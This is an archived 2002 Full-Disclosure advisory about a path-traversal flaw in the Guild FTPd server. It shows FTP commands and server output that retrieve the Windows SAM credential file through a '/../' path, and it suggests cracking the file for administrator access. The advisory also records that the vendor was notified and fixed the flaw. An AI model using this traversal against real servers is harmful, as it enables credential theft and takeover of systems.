lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: full-disclosure at mike-c.com (Mike C)
Subject: Guild FTPd Exploit

______________________________________________________________________
Product Information

Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com

Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in in
the same channels you are, and kick/ban them accordingly.  This is
useful if you wish to keep your ftp data a little more private.
??????????????????????????????????????????????????????????????????????
____________________________________________________________
Exploit Information

Author: Mike C
Date:   7th September 2002

Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
????????????????????????????????????????????????????????????
__________________________________________________
SAM SECURITY FILE
LOCAL PATH      =  C:\windows\repair\sam
FTP ROOT        =  C:\ftp
RELATIVE PATH   =  ../windows/repair/sam
??????????????????????????????????????????????????

1) We try to download the sam file using a relative path to the ftp root


ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
425 Download failed.
ftp>


2) We get a 'Download failed' message, along with a filesize,
   confirming the file exists.  If the file doesn't exist, we get
   'Access denied: File not found.'


3) Adding a / to the start of the relative path seems to bypass the
   server's security relating to relative URLs.  Note however,
   that / doesn't escape the ftp root as you may except.
   Where '../foo.bar' is not accessible, '/../foo.bar' is.


ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>


4) We have just successfully exploited the server, managing to
   download the system's sam file.  An application such as l0phtcrack
   (http://www.atstake.com/research/lc/) could now be used to find
   the passwords, thus giving full administrative access to the
   exploited system.

______________________________________________________________________
Vendor Status:

The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
??????????????????????????????????????????????????????????????????????

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ